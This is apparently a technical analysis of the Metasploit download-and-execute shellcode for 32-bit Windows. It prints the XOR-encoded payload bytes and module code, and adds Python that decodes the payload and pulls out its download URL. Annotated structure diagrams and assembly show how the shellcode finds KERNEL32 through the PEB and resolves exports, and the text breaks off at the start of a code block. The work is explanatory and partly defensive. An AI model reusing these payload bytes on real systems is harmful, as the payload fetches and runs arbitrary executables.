"\x71\xC9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"+ #070 e8 50 00 00 00 83 c6 0d 52 56 ff 57 fc 5a 8b d8 |.P......RV.W.Z..|
"\xF3\x98\xC0\x71\xA4\x99\x99\x99\x1A\x5F\x8A\xCF\xDF\x19\xA7\x19"+ #080 6a 01 59 e8 3d 00 00 00 83 c6 13 56 46 80 3e 80 |j.Y.=......VF.>.|
"\xEC\x63\x19\xAF\x19\xC7\x1A\x75\xB9\x12\x45\xF3\xB9\xCA\x66\xCE"+ #090 75 fa 80 36 80 5e 83 ec 20 8b dc 6a 20 53 ff 57 |u..6.^.. ..j S.W|
"\x75\x5E\x9D\x9A\xC5\xF8\xB7\xFC\x5E\xDD\x9A\x9D\xE1\xFC\x99\x99"+ #0a0 ec c7 04 03 5c 61 2e 65 c7 44 03 04 78 65 00 00 |....a.e.D..xe..|
"\xAA\x59\xC9\xC9\xCA\xCF\xC9\x66\xCE\x65\x12\x45\xC9\xCA\x66\xCE"+ #0b0 33 c0 50 50 53 56 50 ff 57 fc 8b dc 50 53 ff 57 |3.PPSVP.W...PS.W|
"\x69\xC9\x66\xCE\x6D\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA"+ #0c0 f0 50 ff 57 f4 33 c0 ac 85 c0 75 f9 51 52 56 53 |.P.W.3....u.QRVS|
"\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\xBF\x66\x66\x66\xDE"+ #0d0 ff d2 5a 59 ab e2 ee 33 c0 c3 e8 26 ff ff ff 47 |..ZY...3...&...G|
"\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDE\xFC"+ #0e0 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 47 65 |etProcAddress.Ge|
"\xED\xCA\xE0\xEA\xED\xFC\xF4\xDD\xF0\xEB\xFC\xFA\xED\xF6\xEB\xE0"+ #0f0 74 53 79 73 74 65 6d 44 69 72 65 63 74 6f 72 79 |tSystemDirectory|
"\xD8\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xCD\xF1"+ #100 41 00 57 69 6e 45 78 65 63 00 45 78 69 74 54 68 |A.WinExec.ExitTh|
"\xEB\xFC\xF8\xFD\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0"+ #110 72 65 61 64 00 4c 6f 61 64 4c 69 62 72 61 72 79 |read.LoadLibrary|
"\xD8\x99\xEC\xEB\xF5\xF4\xF6\xF7\x99\xCC\xCB\xD5\xDD\xF6\xEE\xF7"+ #120 41 00 75 72 6c 6d 6f 6e 00 55 52 4c 44 6f 77 6e |A.urlmon.URLDown|
"\xF5\xF6\xF8\xFD\xCD\xF6\xDF\xF0\xF5\xFC\xD8\x99"                  #130 6c 6f 61 64 54 6f 46 69 6c 65 41 00             |loadToFileA.|




      # EXITFUNC is not supported :/

      # Register command execution options
      register_options(
        [
          ['URL', [ true, "The pre-encoded URL to the executable" ])
        ], self.class)

  # Constructs the payload
  def generate_stage
    return module_info['Payload']['Payload'] + (datastore['URL'] || '') + "\x80"
  end
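As an added example (my own code, not part of the original post or of the Metasploit module), the Python below reproduces in software what the decoder stub above does in memory and then pulls the trailing URL out, which is what you want when one of these blobs shows up in a capture and you need the download location for blocking or for the incident record. The stub bytes are transcribed from the disassembly above, the encoded body is the byte string printed above, and the URL is a constructed placeholder on a reserved domain; the module's real output would carry whatever URL the operator set.

```python
import struct

# Decoder stub, 0x17 bytes, transcribed from the disassembly above:
#   jmp +0x10 ; pop edx ; dec edx ; xor ecx,ecx ; mov cx,0x13c
#   xor byte [edx+ecx],0x99 ; loop ; jmp +5 ; call -0x15
STUB = bytes.fromhex("EB105A4A33C966B93C0180340A99E2FAEB05E8EBFFFFFF")
STUB_LEN = 0x17               # the call pushes 0x17, the address of the first encoded byte
LENGTH_OFF, KEY_OFF = 8, 13   # imm16 of "mov cx,..." and imm8 of "xor byte [edx+ecx],..."

# The encoded body from the module, copied from the byte string above (0x13C bytes).
ENCODED = (
    b"\x70\x4C\x99\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
    b"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
    b"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
    b"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
    b"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
    b"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
    b"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9D\xC0"
    b"\x71\xC9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
    b"\xF3\x98\xC0\x71\xA4\x99\x99\x99\x1A\x5F\x8A\xCF\xDF\x19\xA7\x19"
    b"\xEC\x63\x19\xAF\x19\xC7\x1A\x75\xB9\x12\x45\xF3\xB9\xCA\x66\xCE"
    b"\x75\x5E\x9D\x9A\xC5\xF8\xB7\xFC\x5E\xDD\x9A\x9D\xE1\xFC\x99\x99"
    b"\xAA\x59\xC9\xC9\xCA\xCF\xC9\x66\xCE\x65\x12\x45\xC9\xCA\x66\xCE"
    b"\x69\xC9\x66\xCE\x6D\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA"
    b"\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\xBF\x66\x66\x66\xDE"
    b"\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDE\xFC"
    b"\xED\xCA\xE0\xEA\xED\xFC\xF4\xDD\xF0\xEB\xFC\xFA\xED\xF6\xEB\xE0"
    b"\xD8\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xCD\xF1"
    b"\xEB\xFC\xF8\xFD\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0"
    b"\xD8\x99\xEC\xEB\xF5\xF4\xF6\xF7\x99\xCC\xCB\xD5\xDD\xF6\xEE\xF7"
    b"\xF5\xF6\xF8\xFD\xCD\xF6\xDF\xF0\xF5\xFC\xD8\x99"
)

# Constructed sample: the module appends the operator's URL and a single 0x80 byte.
SAMPLE_URL = b"http://example.invalid/payload.exe"
SAMPLE_PAYLOAD = STUB + ENCODED + SAMPLE_URL + b"\x80"


def parse_stub(blob):
    """Return (length, key) from the stub, after checking its fixed opcode bytes."""
    fixed = (blob[:LENGTH_OFF] == STUB[:LENGTH_OFF]
             and blob[LENGTH_OFF + 2:KEY_OFF] == STUB[LENGTH_OFF + 2:KEY_OFF]
             and blob[KEY_OFF + 1:STUB_LEN] == STUB[KEY_OFF + 1:STUB_LEN])
    if len(blob) < STUB_LEN or not fixed:
        raise ValueError("not the download_exec decoder stub")
    length = struct.unpack_from("<H", blob, LENGTH_OFF)[0]
    return length, blob[KEY_OFF]


def decode(blob):
    """Emulate the stub: EDX = first encoded byte - 1, XOR [EDX+ECX] for ECX = length .. 1."""
    length, key = parse_stub(blob)
    if len(blob) < STUB_LEN + length:
        raise ValueError("truncated payload")
    buf = bytearray(blob)
    edx = STUB_LEN - 1
    for ecx in range(length, 0, -1):   # LOOP runs ECX down to 1, never touching [EDX+0]
        buf[edx + ecx] ^= key
    return bytes(buf[STUB_LEN:STUB_LEN + length])


def extract_url(blob):
    """The URL follows the encoded body and ends in 0x80, not NUL; the shellcode's
    own scan stops at the first 0x80 as well, so that is the rule applied here."""
    length, _ = parse_stub(blob)
    tail = blob[STUB_LEN + length:]
    end = tail.find(b"\x80")
    if end < 0:
        raise ValueError("URL terminator 0x80 not found")
    return bytes(tail[:end])


def strings_table(decoded):
    """The NUL-separated import names carried at the end of the decoded body."""
    start = decoded.index(b"GetProcAddress\x00")   # first entry, as seen in the dump above
    return [s for s in decoded[start:].split(b"\x00") if s]


if __name__ == "__main__":
    body = decode(SAMPLE_PAYLOAD)
    print(f"decoded {len(body):#x} bytes, first instruction bytes {body[:5].hex(' ')}")
    print("imports:", b", ".join(strings_table(body)).decode())
    print("download URL:", extract_url(SAMPLE_PAYLOAD).decode())
```

The stub parser checks the fixed opcode bytes around the length and key fields, so a blob that has been re-encoded with a different XOR key or a different length still decodes, while anything that is not this stub is rejected rather than guessed at.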



Finding KERNEL32.DLL

The MSDN documentation on the PEB structure is rather lacking in detail.

This is a bit more useful: PEB on

Ditto for the MSDN info on _PEB_LDR_DATA

This is better:PEB_LDR_DATA on,

and this: PEB_LDR_DATA on

The best information I've found on the structures is from using dt in kd.

I originally drew this in ASCII, and then redrew this using the Unicode box drawing characters. But then I discovered that Firefox gets the font metrics completely wrong, so that box drawing characters, in a monospace font, are all different widths, so nothing lines up. ← This is stupid. So it's 7-bit ASCII for now. (WebKit based browsers get it right, and so does lynx and links.)

The first six instructions of the shellcode (after the EIP stuff) find KERNEL32.DLL's base address by walking down the following chain of structures.

The FS segment register points to the _TEB for each executing thread. (Everyone remembers segment registers from the 16-bit days, right?) This is much simpler than keeping the pointer in memory somewhere, and then remembering where that memory was, etc. (It's also used to find the final exception handler if the program just can't cope.) This is also a clever optimization if you're going to be referring to stuff in the structure a lot. (Although FS:0 is unreachable from most C compilers, so inline assembly must be used.) The segment registers aren't used for much in userspace protected mode, so it doesn't contribute to register pressure. The _TEB usually lives around 0x7FFDF000 depending on a bunch of factors (like which version of Windows is used and how many threads).

This technique assumes that KERNEL32.DLL is the first module loaded (first node in the InInitializationOrder Module List). If not, it'll crash and burn. Since all of the shellcode you see these days (in drive-by exploits, etc) does this exact same PEB lookup trick, you can break them all just by loading a dummy DLL first, before KERNEL32. Windows 7 does this now, apparently on accident.

For the uninitiated, I'll show you how this works…


nt!_TEB
   +0x000 NtTib                        : _NT_TIB             <- FS:0
   +0x01c EnvironmentPointer           : Ptr32 Void
   +0x020 ClientId                     : _CLIENT_ID
   +0x028 ActiveRpcHandle              : Ptr32 Void
   +0x02c ThreadLocalStoragePointer    : Ptr32 Void
   +0x030 ProcessEnvironmentBlock      : Ptr32 _PEB -----┐
   +0x034 LastErrorValue               : Uint4B          │
   +0x038 CountOfOwnedCriticalSections : Uint4B          │
   [etc.]                                                │
┌-------------------------------------------------------┘ MOV EAX, [FS:0x30]
│
└-> nt!_PEB
   +0x000 InheritedAddressSpace    : UChar
   +0x001 ReadImageFileExecOptions : UChar
   +0x002 BeingDebugged            : UChar
   +0x003 SpareBool                : UChar
   +0x004 Mutant                   : Ptr32 Void
   +0x008 ImageBaseAddress         : Ptr32 Void
   +0x00c Ldr                      : Ptr32 _PEB_LDR_DATA ---------------┐
   +0x010 ProcessParameters        : Ptr32 _RTL_USER_PROCESS_PARAMETERS │
   +0x014 SubSystemData            : Ptr32 Void                         │
   +0x018 ProcessHeap              : Ptr32 Void                         │
   +0x01c FastPebLock              : Ptr32 _RTL_CRITICAL_SECTION        │
   +0x020 FastPebLockRoutine       : Ptr32 Void                         │
   +0x024 FastPebUnlockRoutine     : Ptr32 Void                         │
   +0x028 EnvironmentUpdateCount   : Uint4B                             │
   +0x02c KernelCallbackTable      : Ptr32 Void                         │
   +0x030 SystemReserved           : [1] Uint4B                         │
   +0x034 AtlThunkSListPtr32       : Uint4B                             │
   +0x038 FreeList                 : Ptr32 _PEB_FREE_BLOCK              │
   [etc.]                                                               │
┌----------------------------------------------------------------------┘ MOV EAX, [EAX+0xC]
│
└-> nt!_PEB_LDR_DATA [AKA: "ProcessModuleInfo" or "PROCESS_MODULE_INFO"]
   +0x000 Length                          : Uint4B
   +0x004 Initialized                     : UChar
   +0x008 SsHandle                        : Ptr32 Void
   +0x00c InLoadOrderModuleList           : _LIST_ENTRY
   +0x014 InMemoryOrderModuleList         : _LIST_ENTRY
   +0x01c InInitializationOrderModuleList : _LIST_ENTRY -----┐
   +0x024 EntryInProgress                 : Ptr32 Void       │
┌------------------------------------------------------------┘ MOV ESI, [EAX+0x1C] ; LODSD
│
│   nt!_LDR_DATA_TABLE_ENTRY
│   +0x000 InLoadOrderLinks           : _LIST_ENTRY
│      +0x000 Flink                   : Ptr32
│      +0x004 Blink                   : Ptr32
│   +0x008 InMemoryOrderLinks         : _LIST_ENTRY
│      +0x000 Flink                   : Ptr32
│      +0x004 Blink                   : Ptr32
│   +0x010 InInitializationOrderLinks : _LIST_ENTRY
└-------> +0x000 Flink                : Ptr32 -┐ This distance
          +0x004 Blink                : Ptr32  │ is eight bytes
   +0x018 DllBase                     : Ptr32 Void -┘ DllBase → _IMAGE_DOS_HEADER
   +0x01c EntryPoint                  : Ptr32 Void
   +0x020 SizeOfImage                 : Uint4B
   +0x024 FullDllName                 : _UNICODE_STRING
   +0x02c BaseDllName                 : _UNICODE_STRING
   +0x034 Flags                       : Uint4B
   +0x038 LoadCount                   : Uint2B
   +0x03a TlsIndex                    : Uint2B
   +0x03c HashLinks                   : _LIST_ENTRY
   +0x03c SectionPointer              : Ptr32 Void
   +0x040 CheckSum                    : Uint4B
   +0x044 TimeDateStamp               : Uint4B
   +0x044 LoadedImports               : Ptr32 Void
   +0x048 EntryPointActivationContext : Ptr32 Void
   +0x04c PatchInformation            : Ptr32 Void
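The walk those four instructions perform, as an added example that is not part of the original post: it runs the same loads against a constructed 32-bit address space laid out with the offsets from the listings above (_TEB+0x30, _PEB+0xC, _PEB_LDR_DATA+0x1C, then one Flink and the DllBase eight bytes past the links). The TEB, PEB and loader-data addresses and the module bases are made up. The process is built twice, once with KERNEL32 right after ntdll and once with a dummy module in between, which shows the dependency the post describes: the code returns whatever DllBase the chain lands on, and nothing checks that it belongs to KERNEL32.

```python
import struct

# Offsets from the kd "dt" listings above (32-bit Windows XP layout).
TEB_PROCESS_ENVIRONMENT_BLOCK = 0x30   # _TEB.ProcessEnvironmentBlock       MOV EAX,[FS:0x30]
PEB_LDR                       = 0x0C   # _PEB.Ldr                           MOV EAX,[EAX+0xC]
LDR_IN_INIT_ORDER_LIST        = 0x1C   # _PEB_LDR_DATA.InInitializationOrderModuleList
ENTRY_IN_INIT_ORDER_LINKS     = 0x10   # InInitializationOrderLinks inside a module entry
ENTRY_DLLBASE                 = 0x18   # DllBase: eight bytes past those links

# Constructed addresses; the real ones vary with OS version and thread count.
TEB_ADDR, PEB_ADDR, LDR_ADDR = 0x7FFDF000, 0x7FFDE000, 0x00191E90


class FakeMemory:
    """Constructed flat 32-bit address space made of a few disjoint bytearrays."""

    def __init__(self):
        self.regions = {}

    def alloc(self, base, size):
        self.regions[base] = bytearray(size)

    def _locate(self, addr):
        for base, buf in self.regions.items():
            if base <= addr <= base + len(buf) - 4:
                return buf, addr - base
        # A bogus Flink in a real process ends the same way: an access violation.
        raise MemoryError(f"unmapped read at {addr:#010x}")

    def read32(self, addr):
        buf, off = self._locate(addr)
        return struct.unpack_from("<I", buf, off)[0]

    def write32(self, addr, value):
        buf, off = self._locate(addr)
        struct.pack_into("<I", buf, off, value)


def build_process(modules):
    """modules: [(name, dll_base), ...] in initialization order.
    Wires up TEB -> PEB -> Ldr -> circular InInitializationOrder list and
    returns (memory, teb_address)."""
    mem = FakeMemory()
    mem.alloc(TEB_ADDR, 0x1000)
    mem.alloc(PEB_ADDR, 0x1000)
    mem.alloc(LDR_ADDR, 0x2000)
    mem.write32(TEB_ADDR + TEB_PROCESS_ENVIRONMENT_BLOCK, PEB_ADDR)
    mem.write32(PEB_ADDR + PEB_LDR, LDR_ADDR)

    head = LDR_ADDR + LDR_IN_INIT_ORDER_LIST          # the _LIST_ENTRY inside _PEB_LDR_DATA
    entries = [LDR_ADDR + 0x100 + 0x80 * i for i in range(len(modules))]
    links = [e + ENTRY_IN_INIT_ORDER_LINKS for e in entries]
    prev = head
    for entry, link, (_, base) in zip(entries, links, modules):
        mem.write32(prev, link)                      # previous node's Flink -> this node
        mem.write32(link + 4, prev)                  # this node's Blink -> previous node
        mem.write32(entry + ENTRY_DLLBASE, base)
        prev = link
    mem.write32(prev, head)                          # last Flink closes the ring
    mem.write32(head + 4, prev)
    return mem, TEB_ADDR


def module_base_via_peb(mem, teb):
    """The shellcode's loads, in order. LODSD follows one Flink from the node the
    list head points at, so the DllBase returned is that of the following node."""
    eax = mem.read32(teb + TEB_PROCESS_ENVIRONMENT_BLOCK)      # MOV EAX,[FS:0x30]  -> _PEB
    eax = mem.read32(eax + PEB_LDR)                            # MOV EAX,[EAX+0xC]  -> _PEB_LDR_DATA
    esi = mem.read32(eax + LDR_IN_INIT_ORDER_LIST)             # MOV ESI,[EAX+0x1C] -> first node's links
    eax = mem.read32(esi)                                      # LODSD              -> that node's Flink
    return mem.read32(eax + ENTRY_DLLBASE - ENTRY_IN_INIT_ORDER_LINKS)  # MOV EAX,[EAX+0x8] -> DllBase


def name_of(modules, base):
    return next(name for name, b in modules if b == base)


if __name__ == "__main__":
    xp = [("ntdll.dll", 0x7C900000), ("kernel32.dll", 0x7C800000)]
    mem, teb = build_process(xp)
    print("XP-like list  :", name_of(xp, module_base_via_peb(mem, teb)))
    shim = [("ntdll.dll", 0x7C900000), ("dummy.dll", 0x10000000), ("kernel32.dll", 0x7C800000)]
    mem, teb = build_process(shim)
    print("dummy inserted:", name_of(shim, module_base_via_peb(mem, teb)))
```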



Importing Functions

So at this point, the shellcode knows where to find the first DLL file that was mapped into memory. Now it finds functions in the library in the same way that Windows does it.


nt!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks           : _LIST_ENTRY
   +0x008 InMemoryOrderLinks         : _LIST_ENTRY
   +0x010 InInitializationOrderLinks : _LIST_ENTRY ← So EAX was pointing here
   +0x018 DllBase                    : Ptr32 Void -------------┐ MOV EAX, [EAX+0x8]
   [etc.]                                                      │
┌-------------------------------------------------------------┘ MOV EBX, EAX
│
└-> nt!_IMAGE_DOS_HEADER   EBX points here, and is used for all Virtual Address offsets
   +0x000 e_magic    : Uint2B (usually "MZ")
   +0x002 e_cblp     : Uint2B
   +0x004 e_cp       : Uint2B
   +0x006 e_crlc     : Uint2B
   +0x008 e_cparhdr  : Uint2B
   +0x00a e_minalloc : Uint2B
   +0x00c e_maxalloc : Uint2B
   +0x00e e_ss       : Uint2B
   +0x010 e_sp       : Uint2B
   +0x012 e_csum     : Uint2B
   +0x014 e_ip       : Uint2B
   +0x016 e_cs       : Uint2B
   +0x018 e_lfarlc   : Uint2B
   +0x01a e_ovno     : Uint2B
   +0x01c e_res      : [4] Uint2B
   +0x024 e_oemid    : Uint2B
   +0x026 e_oeminfo  : Uint2B
   +0x028 e_res2     : [10] Uint2B
   +0x03c e_lfanew   : Int4B -------┐ MOV ESI, [EBX+0x3C]




nt!_IMAGE_NT_HEADERS
   +0x000 Signature  : Uint4B (usually "PE\0\0") --┐
   +0x004 FileHeader : _IMAGE_FILE_HEADER           │
      +0x000 Machine              : Uint2B          │
      +0x002 NumberOfSections     : Uint2B          │
      +0x004 TimeDateStamp        : Uint4B          │
      +0x008 PointerToSymbolTable : Uint4B          │
      +0x00c NumberOfSymbols      : Uint4B          │
      +0x010 SizeOfOptionalHeader : Uint2B          │
      +0x012 Characteristics      : Uint2B          │ This distance is
   +0x018 OptionalHeader : _IMAGE_OPTIONAL_HEADER   │ 0x78 bytes long
      +0x000 Magic                       : Uint2B   │
      +0x002 MajorLinkerVersion          : UChar    │
      +0x003 MinorLinkerVersion          : UChar    │
      +0x004 SizeOfCode                  : Uint4B   │ (That's 0x18+0x60 bytes
      +0x008 SizeOfInitializedData       : Uint4B   │ from the PE header to the
      +0x00c SizeOfUninitializedData     : Uint4B   │ _IMAGE_DATA_DIRECTORY)
      +0x010 AddressOfEntryPoint         : Uint4B   │
      +0x014 BaseOfCode                  : Uint4B   │
      +0x018 BaseOfData                  : Uint4B   │
      +0x01c ImageBase                   : Uint4B   │
      +0x020 SectionAlignment            : Uint4B   │
      +0x024 FileAlignment               : Uint4B   │
      +0x028 MajorOperatingSystemVersion : Uint2B   │
      +0x02a MinorOperatingSystemVersion : Uint2B   │
      +0x02c MajorImageVersion           : Uint2B   │
      +0x02e MinorImageVersion           : Uint2B   │
      +0x030 MajorSubsystemVersion       : Uint2B   │
      +0x032 MinorSubsystemVersion       : Uint2B   │
      +0x034 Win32VersionValue           : Uint4B   │
      +0x038 SizeOfImage                 : Uint4B   │
      +0x03c SizeOfHeaders               : Uint4B   │
      +0x040 CheckSum                    : Uint4B   │
      +0x044 Subsystem                   : Uint2B   │
      +0x046 DllCharacteristics          : Uint2B   │
      +0x048 SizeOfStackReserve          : Uint4B   │
      +0x04c SizeOfStackCommit           : Uint4B   │
      +0x050 SizeOfHeapReserve           : Uint4B   │
      +0x054 SizeOfHeapCommit            : Uint4B   │
      +0x058 LoaderFlags                 : Uint4B   │
      +0x05c NumberOfRvaAndSizes         : Uint4B   │
      +0x060 DataDirectory               : [16] _IMAGE_DATA_DIRECTORY -┘ MOV ESI, [ESI+EBX+0x78]; ADD ESI, EBX


(This isn't exactly kd output, I've fabricated it.)



nt!_IMAGE_DATA_DIRECTORY  Export Table
   +0x060  +0x000 VirtualAddress : Uint4B   RVA of the table - Relative to Base Address (EBX)
   +0x064  +0x004 Size           : Uint4B
nt!_IMAGE_DATA_DIRECTORY  Import Table
   +0x068  +0x008 VirtualAddress : Uint4B
   [etc.]  +0x00c Size           : Uint4B
nt!_IMAGE_DATA_DIRECTORY  Resource Table
           +0x010 VirtualAddress : Uint4B
           +0x014 Size           : Uint4B
nt!_IMAGE_DATA_DIRECTORY  Exception Table
           +0x018 VirtualAddress : Uint4B
           +0x01c Size           : Uint4B
nt!_IMAGE_DATA_DIRECTORY  Certificate Table
           +0x020 VirtualAddress : Uint4B
           +0x024 Size           : Uint4B
nt!_IMAGE_DATA_DIRECTORY  Base Relocation Table
           +0x028 VirtualAddress : Uint4B
           +0x02c Size           : Uint4B
nt!_IMAGE_DATA_DIRECTORY  Debug
           +0x030 VirtualAddress : Uint4B
           +0x034 Size           : Uint4B
nt!_IMAGE_DATA_DIRECTORY  Architecture
           +0x038 VirtualAddress : Uint4B
           +0x03c Size           : Uint4B
nt!_IMAGE_DATA_DIRECTORY  Global Ptr
           +0x040 VirtualAddress : Uint4B
           +0x044 Size           : Uint4B
nt!_IMAGE_DATA_DIRECTORY  TLS Table
           +0x048 VirtualAddress : Uint4B
           +0x04c Size           : Uint4B
nt!_IMAGE_DATA_DIRECTORY  Load Config Table
           +0x050 VirtualAddress : Uint4B
           +0x054 Size           : Uint4B
nt!_IMAGE_DATA_DIRECTORY  Bound Import
           +0x058 VirtualAddress : Uint4B
           +0x05c Size           : Uint4B
nt!_IMAGE_DATA_DIRECTORY  IAT
           +0x060 VirtualAddress : Uint4B
           +0x064 Size           : Uint4B
nt!_IMAGE_DATA_DIRECTORY  Delay Import Descriptor
           +0x068 VirtualAddress : Uint4B
           +0x06c Size           : Uint4B
nt!_IMAGE_DATA_DIRECTORY  CLR Runtime Header
           +0x070 VirtualAddress : Uint4B
           +0x074 Size           : Uint4B
nt!_IMAGE_DATA_DIRECTORY  Reserved
           +0x078 VirtualAddress : Uint4B
           +0x07c Size           : Uint4B


Importing Functions

Now where were we...


nt!_IMAGE_DATA_DIRECTORY  Export Table
   +0x000 VirtualAddress : Uint4B -----┐ MOV ESI, [ESI+EBX+0x78] ; ADD ESI, EBX
   +0x004 Size           : Uint4B     │
┌-----------------------------------┘
│
└-> nt!_IMAGE_EXPORT_DIRECTORY
   +0x000 Characteristics       : Uint4B
   +0x004 TimeDateStamp         : Uint4B
   +0x008 MajorVersion          : Uint2B
   +0x00a MinorVersion          : Uint2B
   +0x00c Name                  : Uint4B
   +0x010 Base                  : Uint4B
   +0x014 NumberOfFunctions     : Uint4B ------ MOV ECX, [ESI+0x14]   Number of Names or Functions in EAT.
   +0x018 NumberOfNames         : Uint4B                              Because of aliasing, these can be different values.
                                                                      The shellcode uses the wrong one for the name lookup loop.
   +0x01c AddressOfFunctions    : Uint4B
   +0x020 AddressOfNames        : Uint4B -----┐ MOV EDI, [ESI+0x20] ; ADD EDI, EBX
   +0x024 AddressOfNameOrdinals : Uint4B     │
                                             │ The Export Name Table is just an
                                             │ array of pointers to C-style strings.
                                             │ The Ordinal table uses the exact
                                             │ same array indexes.
│ As a concrete example, I'm using RVA values from the WinXP SP2 English KERNEL32.DLL
│ The base address of this DLL is 0x77E80000, so EBX will be pointing there in the code below.
│ Base Address + RVA = Actual Virtual Address in memory (Most of the time)
EDI↓ AddressOfNames=0x577B2                   AddressOfNameOrdinals=0x57144   AddressOfFunctions=0x56468
name[  0]=0x5849B → "AddAtomA\0"                   ordinal[  0]=0x0000          function[0x0000]=0x0000932E
name[  1]=0x584A4 → "AddAtomW\0"                   ordinal[  1]=0x0001          function[0x0001]=0x00009BC4
name[  2]=0x584AD → "AddConsoleAliasA\0"           ordinal[  2]=0x0002          function[0x0002]=0x00044457
name[  3]=0x584BE → "AddConsoleAliasW\0"           ordinal[  3]=0x0003          function[0x0003]=0x00044420
name[  4]=0x584CF → "AllocConsole\0"               ordinal[  4]=0x0004          function[0x0004]=0x0004520E
name[  5]=0x584DC → "AllocateUserPhysicalPages\0"  ordinal[  5]=0x0005          function[0x0005]=0x000339D6
name[  6]=0x584F6 → "AreFileApisANSI\0"            ordinal[  6]=0x0006          function[0x0006]=0x00018678
name[  7]=0x58506 → "AssignProcessToJobObject\0"   ordinal[  7]=0x0007          function[0x0007]=0x00043BAE
name[  8]=0x5851F → "BackupRead\0"                 ordinal[  8]=0x0008          function[0x0008]=0x00029776
name[  9]=0x5852A → "BackupSeek\0"                 ordinal[  9]=0x0009          function[0x0009]=0x000299D2
name[ 10]=0x58535 → "BackupWrite\0"                ordinal[ 10]=0x000A          function[0x000A]=0x0002A2FA
name[ 11]=0x58541 → "BaseAttachCompleteThunk\0"    ordinal[ 11]=0x000B          function[0x000B]=0x00028916
name[ 12]=0x58559 → "Beep\0"                       ordinal[ 12]=0x000C          function[0x000C]=0x0002A518
[...]                                              [...]                        [...]
name[339]=0x59DA5 → "GetProcAddress\0"             ordinal[339]=0x0153          function[0x0153]=0x0001564B
[...]                                              [...]                        [...]
name[821]=0x5BEA9 → "lstrlenA\0"                   ordinal[821]=0x0335          function[0x0335]=0x00017334
name[822]=0x5BEB2 → "lstrlenW\0"                   ordinal[822]=0x0336          function[0x0336]=0x0000CD5C
      ║                                                  ⇑   ║                         ⇑
      ╚==================================================╝   ╚=========================╝

; So this loop walks down the AddressOfNames array, doing string comparisons with the strings stored at
; the end of the shellcode. It keeps track of how many iterations the loop has gone through,
; which will be the ordinal number when the loop exits.
; (The left half of the diagram above.)

; EDI and ECX get clobbered for the REPE CMPSB op
NameToOrdinal:
push edi            ; 57       ; AddressOfNames Array                          Stack: EDI
push ecx            ; 51       ; NumberOfFunctions left to go                  Stack: ECX EDI
mov edi, [edi]      ; 8B 3F    ; EDI points to start of a Name String
add edi, ebx        ; 03 FB    ; RVA to VA conversion
mov esi, edx        ; 8B F2    ; EDX points to string table at end of shellcode "GetProcAddress" etc.
push byte +0xe      ; 6A 0E    ; Only compare the first fourteen chars
pop ecx             ; 59       ; ECX = 0xE
repe cmpsb          ; F3 A6    ; Compare [ESI] with [EDI]
jz Exitloop         ; 74 08    ; If we've found the string, we're done
pop ecx             ; 59       ; NumberOfFunctions left to check.              Stack: EDI
pop edi             ; 5F       ; Current Index of AddressOfNames Array
add edi, byte +0x4  ; 83 C7 04 ; Next AddressOfNames pointer
inc ebp             ; 45       ; Ordinal / AddressOfNames Array index
loop NameToOrdinal  ; E2 E9    ;

; snip...
; This code finds the function's address using the ordinal
; (The center half of the diagram above.)
mov ecx, ebp        ; 8B CD    ; EBP = Ordinal (AddressOfNames Array index)
mov eax, [esi+0x24] ; 8B 46 24 ; AddressOfNameOrdinals RVA
add eax, ebx        ; 03 C3    ; RVA to VA conversion
shl ecx, 1          ; D1 E1    ; Ordinal * 2
add eax, ecx        ; 03 C1    ; EAX = (*AddressOfNameOrdinals) + (Ordinal * 2)
                               ; to put it another way, EAX = &AddressOfNameOrdinals[Ordinal]
xor ecx, ecx        ; 33 C9    ; ECX = 0
mov cx, [eax]       ; 66 8B 08 ; CX = Ultimate Index (FunctionOrdinal) into AddressOfFunctions

; (The right half of the diagram above.) (Yes I know that's three halves.)
mov eax, [esi+0x1c] ; 8B 46 1C ; AddressOfFunctions RVA
add eax, ebx        ; 03 C3    ; RVA to VA conversion
shl ecx, 0x2        ; C1 E1 02 ; FunctionOrdinal * 4
add eax, ecx        ; 03 C1    ; EAX = (*AddressOfFunctions) + (FunctionOrdinal * 4)
                               ; alt. EAX = &AddressOfFunctions[AddressOfNameOrdinals[Ordinal]]
mov eax, [eax]      ; 8B 00    ; EAX = RVA of function (ta-da)
add eax, ebx        ; 03 C3    ; RVA to VA conversion
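As an added example (mine, not the post's and not any loader's code), the Python below performs the same name → ordinal → function hops over a constructed minimal PE32 image with one export directory, using the header offsets from the diagrams above (e_lfanew at 0x3C, the export DataDirectory entry 0x78 bytes past the PE signature, and the export directory fields at 0x14 through 0x24). The image is built flat so that RVAs equal offsets, just as the shellcode adds EBX to each one; the GetProcAddress RVA is the XP SP2 value quoted in the table above and the other RVAs are made up. The second return value counts how many name-table reads would run past NumberOfNames when the loop is bounded by NumberOfFunctions the way the shellcode's is, which only happens when the DLL has exports without names and the wanted name is absent.

```python
import struct
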